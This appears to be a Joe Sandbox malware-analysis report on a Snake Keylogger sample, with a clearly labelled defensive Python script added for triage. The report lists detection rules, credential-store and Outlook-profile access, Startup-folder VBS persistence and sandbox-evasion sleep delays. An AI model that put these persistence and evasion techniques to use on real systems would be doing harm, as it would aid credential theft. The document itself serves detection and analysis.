                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B237B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B110BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_009410BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B3A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B2648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | File created: C:\Users\user\AppData\Local\Hegeleos
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | File created: C:\Users\user\AppData\Local\Temp\autC9B1.tmp
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                Source: RubzLi27lr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RegSvcs.exe, 00000003.00000002.3370428340.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003238000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000321A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000326A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000325E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000322A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RubzLi27lr.exe | Virustotal: Detection: 68%
                Source: RubzLi27lr.exe | ReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | File read: C:\Users\user\Desktop\RubzLi27lr.exe
                Source: unknown | Process created: C:\Users\user\Desktop\RubzLi27lr.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Process created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RubzLi27lr.exe"
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: RubzLi27lr.exe | Static file information: File size 1094656 > 1048576
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RubzLi27lr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP | source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb | source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
                Source: RubzLi27lr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RubzLi27lr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RubzLi27lr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RubzLi27lr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RubzLi27lr.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD0A76 push ecx; ret 0_2_00AD0A89
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00900A76 push ecx; ret 2_2_00900A89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A9921E push es; ret 9_2_06A99244
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | File created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe

                Boot Survival

                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00ACF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ACF98E
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B41C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B41C41
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_008FF98E
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00971C41
                Source: C:\Users\user\Desktop\RubzLi27lr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
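
The following triage script is an added example and is not part of the Joe Sandbox report or of the sample's code. It parses signature lines in the shape shown on this page (the source process path fused to the signature name, with a trailing "Jump to behavior" or "Jump to dropped file" link label) and pulls out the two findings a responder would act on: the script written to the Startup folder under Boot Survival above, and the Thread delayed values listed under Malware Analysis System Evasion below. The value 922337203685477 is Int64.MaxValue ticks divided by the 10 000 ticks per millisecond, i.e. TimeSpan.MaxValue in whole milliseconds, so a delay of that size is an effectively unbounded wait; the 600000 ms (10 minute) value followed by values that fall by roughly 110 ms each is read here as a loop that re-sleeps the remaining part of a fixed window, which is an interpretation, not something the report states. The sample lines are constructed by copying lines from this report; the run-detection thresholds are assumptions.

```python
"""Triage helpers for Joe Sandbox behaviour-signature lines.

Added example; not Joe Sandbox code. The input shape is assumed from the
lines as they appear on this page.
"""
import re

# TimeSpan.MaxValue in whole milliseconds: Int64.MaxValue ticks / 10 000
# ticks per ms. A sleep of this length is an effectively unbounded wait.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477

# Script types that run from a Startup folder without further user action
# (assumed list; extend as needed).
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".ps1")
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

_SIG = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)"                # process path, fused to the signature name
    r"(?P<kind>File created|Thread delayed|Key opened|Process information set)"
    r":\s*(?P<detail>.*?)"
    r"(?:Jump to behavior|Jump to dropped file)?\s*$",   # trailing link label, if any
    re.IGNORECASE,
)

# Constructed sample: lines copied from this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\RubzLi27lr.exeFile created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbsJump to dropped file",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior",
]


def parse_signature(line):
    """Split one signature line into (process, kind, detail).

    Returns None for lines that are not in the expected shape (headings,
    page residue such as "barindex", static PE information lines).
    """
    m = _SIG.match(line.strip())
    if not m:
        return None
    return m.group("proc"), m.group("kind"), m.group("detail").strip()


def startup_persistence(lines):
    """Return (dropper, dropped_script) pairs for script files written to a
    Startup folder: the persistence this report flags as
    'Drops VBS files to the startup folder'."""
    hits = []
    for line in lines:
        parsed = parse_signature(line)
        if parsed is None:
            continue
        proc, kind, path = parsed
        low = path.lower()
        if kind.lower() == "file created" and STARTUP_MARKER in low and low.endswith(SCRIPT_EXTS):
            hits.append((proc, path))
    return hits


def delay_analysis(lines, min_run=3, max_step_ms=1000):
    """Per process: the Thread delayed values in ms, whether a TimeSpan.MaxValue
    sleep was seen, whether the finite values form a descending countdown
    (at least min_run consecutive values each lower than the previous one
    by at most max_step_ms), and the sum of the finite delays."""
    per_proc = {}
    for line in lines:
        parsed = parse_signature(line)
        if parsed is None or parsed[1].lower() != "thread delayed":
            continue
        proc, _, detail = parsed
        m = re.search(r"(\d+)\s*$", detail)
        if not m:
            continue
        per_proc.setdefault(proc, []).append(int(m.group(1)))

    report = {}
    for proc, delays in per_proc.items():
        finite = [d for d in delays if d < TIMESPAN_MAX_MS]
        longest = run = 1
        for prev, cur in zip(finite, finite[1:]):
            run = run + 1 if 0 < prev - cur <= max_step_ms else 1
            longest = max(longest, run)
        report[proc] = {
            "delays": delays,
            "infinite_sleep": any(d >= TIMESPAN_MAX_MS for d in delays),
            "countdown_loop": longest >= min_run,
            "finite_total_ms": sum(finite),
        }
    return report


if __name__ == "__main__":
    for dropper, script in startup_persistence(SAMPLE_LINES):
        print(f"startup persistence: {dropper} -> {script}")
    for proc, info in delay_analysis(SAMPLE_LINES).items():
        print(f"{proc}: {info}")
```

Feed it the full signature list (one line per entry, as on this page) rather than the six constructed lines to get the complete countdown and the total time the payload spends sleeping, which is what decides how long a sandbox run must be to see the keylogger's post-delay activity.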

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RubzLi27lr.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAPI/Special instruction interceptor: Address: 139F24C
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAPI/Special instruction interceptor: Address: 17BED7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599228Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598886Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598770Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598479Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598372Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596624Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
